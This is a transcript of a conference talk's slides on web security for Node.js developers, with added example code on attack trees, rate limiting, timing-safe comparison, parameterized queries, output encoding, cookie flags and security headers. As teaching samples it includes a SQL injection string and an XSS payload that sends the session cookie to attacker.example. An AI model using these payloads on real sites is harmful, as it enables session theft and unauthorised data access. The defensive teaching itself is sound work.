Surviving Web Security

Gergely Nemeth

github.com/gergely | twitter.com/nthgergo | [email protected]

Transcript of Surviving Web Security

TRACE - NODE.JS MONITORING

https://trace.risingstack.com

WHAT DO THEY HAVE IN COMMON?

TOGETHER, ALMOST 1 BILLION USER ACCOUNTS COMPROMISED

https://haveibeenpwned.com

2014/2015 In Retrospect

Lots of high-profile vulnerabilities such as

Shellshock

Heartbleed

an average of 158 days to fix security issues

in some industries security tickets may be open for more than 2 years

XSS affects 47% and CSRF affects 24% of all web apps.

Enter Attack Trees

ATTACK TREES

“formal, methodical way of describing the security of systems, based on varying attacks”

Bruce Schneier

ATTACK TREES

Open safe
  Pick lock
  Learn combo
    Find it written
    Learn from target
      Blackmail
      Eavesdrop
        Listen to convo
        Get target to say
      Bribe
  Cut open
  Bad setup

(Every node is an OR node except Eavesdrop, which is an AND node: the eavesdropper needs both to listen to the conversation and to get the target to say the combination.)

ATTACK TREES

to get the most out of attack trees, you have to combine them with knowledge of the attackers: which leaves a given attacker can actually pull off

ATTACK TREES

(P) = possible, (I) = impossible for the attacker in question. An OR node is possible if any child is; the AND node (Eavesdrop) is possible only if all of its children are.

Open safe (P)
  Pick lock (I)
  Learn combo (P)
    Find it written (I)
    Learn from target (P)
      Blackmail (I)
      Eavesdrop (I)
        Listen to convo (P)
        Get target to say (I)
      Bribe (P)
  Cut open (P)
  Bad setup (I)
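As an added example (editor's code, not from the talk or from RisingStack), here is the safe tree above encoded in JavaScript with Schneier's possible/impossible labels and evaluated bottom-up. The node names and (P)/(I) labels follow the slide and the AND marking of Eavesdrop is Schneier's original; the helper names (`leaf`, `or`, `and`, `isPossible`, `possiblePaths`) are mine.

```javascript
// Node constructors: leaves carry the (P)/(I) label, inner nodes an operator.
function leaf(name, possible) {
  return { name, possible };
}
function or(name, children) {
  return { name, op: 'OR', children };
}
function and(name, children) {
  return { name, op: 'AND', children };
}

// The safe-cracking tree from the slides with the (P)/(I) labels.
// Eavesdrop is an AND node, which is why it is (I) although one child is (P).
const openSafe = or('Open safe', [
  leaf('Pick lock', false),
  or('Learn combo', [
    leaf('Find it written', false),
    or('Learn from target', [
      leaf('Blackmail', false),
      and('Eavesdrop', [
        leaf('Listen to convo', true),
        leaf('Get target to say', false),
      ]),
      leaf('Bribe', true),
    ]),
  ]),
  leaf('Cut open', true),
  leaf('Bad setup', false),
]);

// OR: any child possible makes the goal possible. AND: every child must be.
function isPossible(node) {
  if (!node.children) return node.possible;
  const results = node.children.map(isPossible);
  return node.op === 'AND' ? results.every(Boolean) : results.some(Boolean);
}

// Every root-to-leaf path the attacker can currently take; these are the
// leaves a defender has to turn from (P) into (I).
function possiblePaths(node, trail = []) {
  const path = [...trail, node.name];
  if (!node.children) return node.possible ? [path] : [];
  if (!isPossible(node)) return [];
  return node.children.flatMap((child) => possiblePaths(child, path));
}
```

For the labelled tree this yields two open paths, Learn combo via Bribe and Cut open; closing them (for example, a harder-to-cut safe and a combination holder who cannot be bribed) is what turns the root into (I) for that attacker.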

An Example Attack Tree of a Trace Account

EXAMPLE ATTACK TREE OF A TRACE ACCOUNT

Get access to account

Modify credentials in the database

Learn password

Get access to database

Social engineering

Get access to DMZ

Listen on the transport layer

Brute force

Bypass access control

SQL Injection

Session hijack

Insecure dependency


Secure the Transport Layer

SECURE TRANSPORT LAYER

(the attack tree above, with "Listen on the transport layer" highlighted)

SECURE TRANSMISSION - SSL

HTTP is a clear-text protocol: anyone on the path can read and modify it, so it is vulnerable to man-in-the-middle attacks.

Always use HTTPS.

Defend Against Brute-force attacks

BRUTE-FORCE ATTACKS

(the attack tree above, with "Brute force" highlighted)

BRUTE-FORCE PROTECTION

// ratelimiter (npm), keyed by the e-mail address being attacked, backed by Redis
var Limiter = require('ratelimiter')
var email = req.body.email
var limit = new Limiter({ id: email, db: db }) // db: a connected redis client

limit.get(function (err, limit) {
  // callback body: editor's completion following the ratelimiter README
  if (err) return next(err)
  if (limit.remaining) return next() // attempts left in the current window
  res.status(429).send('Too many attempts, try again later')
})
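Added example (editor's code, not the talk's and not the `ratelimiter` package): the same idea as the Redis-backed limiter above as an in-memory sliding window, so it runs offline. Two limits are combined, a tight one per account (stops guessing one victim's password from many IPs) and a looser one per client IP (stops one host from spraying many accounts). The limits (5 per account, 50 per IP, per 15 minutes), the lower-casing of the e-mail key and the names `createLimiter` / `loginGuard` are my assumptions.

```javascript
// Sliding-window limiter: remembers attempt timestamps per key.
function createLimiter({ max, windowMs }) {
  const hits = new Map(); // key -> array of attempt timestamps (ms)

  // Record an attempt for `key` at `now` and report whether it is allowed.
  function check(key, now = Date.now()) {
    const cutoff = now - windowMs;
    const recent = (hits.get(key) || []).filter((t) => t > cutoff);
    if (recent.length >= max) {
      hits.set(key, recent);
      // The oldest attempt still in the window decides when a slot frees up.
      return { allowed: false, remaining: 0, retryAfterMs: recent[0] + windowMs - now };
    }
    recent.push(now);
    hits.set(key, recent);
    return { allowed: true, remaining: max - recent.length, retryAfterMs: 0 };
  }
  return { check };
}

const FIFTEEN_MINUTES = 15 * 60 * 1000;
const perEmail = createLimiter({ max: 5, windowMs: FIFTEEN_MINUTES });
const perIp = createLimiter({ max: 50, windowMs: FIFTEEN_MINUTES });

// Guard for the login route. Normalising the e-mail keeps "Victim@Example.com"
// and "victim@example.com" from being counted as two different accounts.
function loginGuard(email, ip, now = Date.now()) {
  const byEmail = perEmail.check(email.trim().toLowerCase(), now);
  const byIp = perIp.check(ip, now);
  return {
    allowed: byEmail.allowed && byIp.allowed,
    retryAfterMs: Math.max(byEmail.retryAfterMs, byIp.retryAfterMs),
  };
}
```

In an Express handler the result maps onto `res.status(429)` with a `Retry-After` header derived from `retryAfterMs`; the per-account limit is the one that matters against an attacker who rotates source addresses. Counting only failed attempts (reset on success) is a common refinement not shown here.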

BRUTE-FORCE PROTECTION - TIMING ATTACKS

// the bad solution
if (userEnteredPassword === passwordFromDb) {
  return true
}
return false

BRUTE-FORCE PROTECTION - TIMING ATTACKS

[figure: character-by-character comparison of T R A C E against T R A C E (every character matches) and of T R A C E against T R I C K (mismatch at the third character, marked x, after which the comparison stops early)]

PASSWORDS - EQUALITY CHECK

Always use fixed-time comparison

BRUTE-FORCE PROTECTION - TIMING ATTACKS

// the good solution
var cryptiles = require('cryptiles')

if (cryptiles.fixedTimeComparison(userEnteredPassword, passwordFromDb)) {
  return true
}
return false

Defend Against SQL Injection Attacks

SQL INJECTION

(the attack tree above, with "SQL Injection" highlighted)

DATA VALIDATION - SQL INJECTION

This attack vector consists of injection of a partial or complete SQL query via user input

DATA VALIDATION - SQL INJECTION

select username, password from users where username=$username

can become:

select username, password from users where username=john or 1=1

DATA VALIDATION - SQL INJECTION

Defend against it with parameterized queries / prepared statements

// parameterized query (query: node-postgres' client.query; values are bound
// by the database after the statement is parsed, so they cannot alter it)
query("select name from emp where emp_id=$1", [123])

// prepared statement, parsed once and reused by name on later calls
query({
  name: "emp_name",
  text: "select name from emp where emp_id=$1",
  values: [123]
})
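Added example (editor's code, not the talk's): the injection above run against a string-built query next to its parameterized form in the `{text, values}` shape node-postgres accepts. `renderForDisplay` is a toy that quotes bound values the way a driver would for display only, to show that the payload stays a string literal; it is not how node-postgres binds parameters. The attacker input is constructed for the example.

```javascript
// Vulnerable: user input spliced into the SQL text becomes part of the statement.
function vulnerableQuery(username) {
  return `select username, password from users where username='${username}'`;
}

// Safe: the statement text is fixed, the value travels separately.
function parameterizedQuery(username) {
  return {
    text: 'select username, password from users where username=$1',
    values: [username],
  };
}

// Toy rendering of bound parameters (single quotes doubled), for display
// only; a real database binds values after parsing, so they can never
// change the statement's structure.
function renderForDisplay({ text, values }) {
  return text.replace(/\$(\d+)/g, (_, n) => {
    const v = values[Number(n) - 1];
    return `'${String(v).replace(/'/g, "''")}'`;
  });
}

// Constructed attacker input: closes the string, adds a tautology, comments out the rest.
const injectionPayload = "john' or 1=1 --";
```

With the payload, the vulnerable version returns every row (the `or 1=1` is live SQL and `--` discards the trailing quote), while the parameterized version looks for a user literally named `john' or 1=1 --`.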

Defend Against Session Hijack

SESSION HIJACK

(the attack tree above, with "Session hijack" highlighted)

Securing Cookies

COOKIES - COOKIE FLAGS

- Secure - this attribute tells the browser to only send the cookie if the request is being sent over HTTPS.
- HttpOnly - this attribute is used to help prevent attacks such as cross-site scripting, since it does not allow the cookie to be accessed via JavaScript. It does not stop the injection itself, but it keeps an injected script from reading the session cookie.

Unwanted JavaScript

DATA VALIDATION - XSS

- Reflected Cross Site Scripting occurs when the attacker injects executable JavaScript code into the HTML response with specially crafted links: the payload travels in the request and is echoed back unescaped.
- Stored Cross Site Scripting occurs when the application stores user input which is not correctly filtered and later renders it to other users.

In both cases the script runs within the victim's browser under the privileges of the web application (its origin, and with it the session).

DATA VALIDATION - XSS

Defend against it with input validation and, above all, context-aware output encoding: escape every untrusted value for the context (HTML body, attribute, JavaScript, URL) it is rendered into.
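Added example (editor's code, not the talk's): output encoding for the HTML body and attribute contexts, applied to a reflected search term. Input validation can reject what is not a name or a number, but it cannot reject every string that is dangerous in HTML, which is why the escaping happens at render time. The page fragments, helper names and the constructed payload are mine.

```javascript
// Entity-encode the five characters that matter in the HTML body context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Reflected XSS: the search term from the URL is echoed straight into the page.
function renderSearchVulnerable(term) {
  return `<p>Results for ${term}</p>`;
}

// Same page with the term encoded: the browser shows the tags as text.
function renderSearchSafe(term) {
  return `<p>Results for ${escapeHtml(term)}</p>`;
}

// Attribute context: the value must be quoted AND escaped. Escaping alone is
// not enough for an unquoted attribute, where a space ends the value.
function renderInput(value) {
  return `<input name="q" value="${escapeHtml(value)}">`;
}

// Constructed payload: exfiltrates the session cookie, which is exactly what
// the HttpOnly flag from the previous section denies to script.
const xssPayload = '<script>location="https://attacker.example/?c="+document.cookie</script>';
```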

SECURITY HEADERS

- Strict-Transport-Security enforces secure (HTTP over SSL/TLS) connections to the server
- X-Frame-Options provides clickjacking protection
- X-XSS-Protection enables the Cross-site scripting (XSS) filter built into most recent web browsers (the major browsers have since removed that filter, so treat this header as legacy and rely on Content-Security-Policy instead)
- Content-Security-Policy prevents a wide range of attacks, including Cross-site scripting and other cross-site injections
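Added example (editor's code, not the talk's) serving both the cookie-flags section and the header list above: a function that sets the four headers and a session cookie with Secure and HttpOnly on a Node `http`-style response, and an audit function that reports what is missing from a response. The header values (HSTS max-age, the CSP, DENY), the `SameSite=Lax` attribute (not on the slides) and the function names are my choices.

```javascript
// Values are illustrative; tune the CSP to what the application actually loads.
const SECURITY_HEADERS = {
  'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
  'X-Frame-Options': 'DENY',
  'X-XSS-Protection': '1; mode=block',
  'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'",
};

// Secure: only sent over HTTPS. HttpOnly: invisible to document.cookie.
// SameSite=Lax (assumption, not on the slide) also limits cross-site sending.
function sessionCookie(name, value, { maxAgeSeconds }) {
  return `${name}=${encodeURIComponent(value)}; Max-Age=${maxAgeSeconds}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Apply to anything with a setHeader(name, value) method (Node http, Express).
function applySecurity(res, sessionId) {
  for (const [name, value] of Object.entries(SECURITY_HEADERS)) res.setHeader(name, value);
  res.setHeader('Set-Cookie', sessionCookie('sid', sessionId, { maxAgeSeconds: 3600 }));
}

// Audit a header map with lower-cased names (the shape res.getHeaders()
// returns) and list what a scanner would flag.
function auditHeaders(headers) {
  const findings = [];
  for (const name of Object.keys(SECURITY_HEADERS)) {
    if (!headers[name.toLowerCase()]) findings.push(`missing ${name}`);
  }
  const cookies = [].concat(headers['set-cookie'] || []);
  for (const cookie of cookies) {
    const cookieName = cookie.split('=')[0];
    const attrs = cookie.split(';').slice(1).map((a) => a.trim().toLowerCase());
    if (!attrs.includes('secure')) findings.push(`cookie ${cookieName} lacks Secure`);
    if (!attrs.includes('httponly')) findings.push(`cookie ${cookieName} lacks HttpOnly`);
  }
  return findings;
}
```

With Express the cookie half is `res.cookie('sid', id, { secure: true, httpOnly: true })`; the audit function is useful as a unit test over `res.getHeaders()` so a refactor that drops a flag fails the build rather than a pentest.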

Handling Dependencies


HANDLING DEPENDENCIES

You are what you require

HANDLING DEPENDENCIES

Use retire.js / the NSP CLI (the NSP CLI has since been folded into npm audit)

https://nodesecurity.io

HANDLING DEPENDENCIES

Update your dependencies frequently

https://greenkeeper.io

Environment Setup

RESTRICT DATABASE ACCESS

(the attack tree above, with "Get access to database" highlighted)

ENVIRONMENT SETUP

Put your databases inside a VPN with your application servers

ENVIRONMENT SETUP

Be careful with default passwords

ENVIRONMENT SETUP

At least 6,000 Redis instances are compromised right now

The Human Factor

95% of all security incidents involve human error

We are the weakest link

Security must be part of the agile workflow

Stories should include acceptance criteria for security

EXAMPLE STORY

Given an unauthenticated user
When she tries to view her profile
Then she is redirected to the login page

Developers should implement features with security requirements in mind


LIKE THE OWASP TOP 10

https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet

Injection

Weak authentication and session management

XSS

Insecure Direct Object References

Security Misconfiguration

Sensitive Data Exposure

Missing Function Level Access Control

Cross Site Request Forgery

Using Components with Known Vulnerabilities

Unvalidated Redirects and Forwards

Security is part of your job!